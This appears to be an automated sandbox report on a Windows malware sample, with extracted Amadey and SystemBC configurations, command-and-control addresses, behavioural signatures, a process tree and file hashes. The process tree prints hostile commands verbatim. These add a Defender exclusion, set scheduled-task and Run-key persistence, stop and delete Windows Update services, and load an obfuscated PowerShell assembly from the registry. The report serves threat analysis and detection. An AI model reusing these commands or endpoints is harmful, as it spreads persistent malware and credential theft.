Analysis
-
max time kernel
301s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
13-12-2022 05:05
General
-
Target
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
-
Size
5.5MB
-
MD5
dcded7ac014d98160a90789c615ae3cf
-
SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da
-
SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
-
SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
SSDEEP
98304:IrxJwipiyZZ9RmdEeGCbGAstmlUse5mvKLgO/zhyPSp8616v+E7LF9yzTuU:INZpimLRvCbVlLnSg6piW+T4
Malware Config
Extracted
amadey
3.60
85.209.135.11/gjend7w/index.php
Extracted
systembc
89.22.236.225:4193
176.124.205.5:4193
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
-
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 11 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 22 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\acc0b83959" /P "Admin:N"&&CACLS "..\acc0b83959" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\acc0b83959" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\acc0b83959" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /C schtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe"C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gkucwdcha#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvndrivesllapi' /tr '''C:\Users\Admin\PLocktime\nvndrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvndrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvndrivesllapi" /t REG_SZ /f /d 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn nvndrivesllapi /tr 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe'3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"2⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xtjjcgktv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvndrivesllapi" } Else { "C:\Users\Admin\PLocktime\nvndrivesllapi.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn nvndrivesllapi3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {D4C5A827-FA2F-41B6-9125-E2899B29676E} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exeC:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exeC:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\PLocktime\nvndrivesllapi.exeC:\Users\Admin\PLocktime\nvndrivesllapi.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskeng.exetaskeng.exe {38D8D9DE-46A4-4F38-BBB5-F9B8314B360B} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+'i'+'a'+'l'+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OFT'+'W'+''+[Char](65)+''+'R'+'E').GetValue('d'+'i'+''+'a'+''+'l'+''+[Char](101)+''+'r'+''+'s'+'ta'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
7KB
MD51c731cf766f982d7cc5ee8765928a5ca
SHA1d25f632117597ef524c7088a515ad6d90b9943f8
SHA256d52d1da7d75ec6983a2f9189f30df782f8306a8eed3d16d997e830268b84e9d5
SHA512755217d70dfe497747a66957e9b8974db57c3f3ffcce05c56096df5744d82ca023493dd13fba540130f8fd55d3174055d222abedc16345d037f33348a793f4c1
-
Filesize
7KB
MD51c731cf766f982d7cc5ee8765928a5ca
SHA1d25f632117597ef524c7088a515ad6d90b9943f8
SHA256d52d1da7d75ec6983a2f9189f30df782f8306a8eed3d16d997e830268b84e9d5
SHA512755217d70dfe497747a66957e9b8974db57c3f3ffcce05c56096df5744d82ca023493dd13fba540130f8fd55d3174055d222abedc16345d037f33348a793f4c1
-
Filesize
718.5MB
MD5bbda4d8a521465f802041af70f01df2b
SHA154acd1c96672b9ab1ff3a19060f76c881cb266c8
SHA256b3ae877dbbaa4e1f62dc3073c2041044410868a9af2e496adfd8aa8009bb081e
SHA512283cac686b3c501751edace4d8b0f902f9f15e195071d15a7503cf97259d534260dff71abadea09cb84f19257a045fd1f37c84b37ad5e7e3a4fc623accf9679e
-
Filesize
718.5MB
MD5bbda4d8a521465f802041af70f01df2b
SHA154acd1c96672b9ab1ff3a19060f76c881cb266c8
SHA256b3ae877dbbaa4e1f62dc3073c2041044410868a9af2e496adfd8aa8009bb081e
SHA512283cac686b3c501751edace4d8b0f902f9f15e195071d15a7503cf97259d534260dff71abadea09cb84f19257a045fd1f37c84b37ad5e7e3a4fc623accf9679e
-
Filesize
5.0MB
MD524ece515d8082af9bbf326e17e9f0670
SHA19b7e8e37f2a27ee3c92835873e446686e6f0a723
SHA2568c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe
SHA512e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
SHA512fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
Filesize
5.5MB
MD5dcded7ac014d98160a90789c615ae3cf
SHA1e1f14ffa121e6618aaa5760c91d129503f7656da
SHA2567c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
